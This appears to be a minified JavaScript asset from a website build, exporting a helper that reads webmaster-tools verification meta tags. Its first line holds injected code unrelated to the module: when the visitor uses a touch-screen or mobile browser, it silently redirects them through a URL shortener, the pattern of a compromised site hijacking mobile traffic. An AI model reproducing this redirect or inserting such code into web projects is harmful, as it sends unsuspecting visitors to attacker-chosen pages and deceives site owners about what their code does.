(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{y as r}from"./app-core.c8323d51.js";const s=o=>{const t=document.createElement("div");return t.innerHTML=o,t.firstChild},c=()=>({maybeUpdateId:t=>{const e=r(),n=s(e.options.webmasterTools[t]);n instanceof HTMLElement&&n.nodeName==="META"&&n.getAttribute("content").length&&(e.options.webmasterTools[t]=n.getAttribute("content"))}});export{c as u};
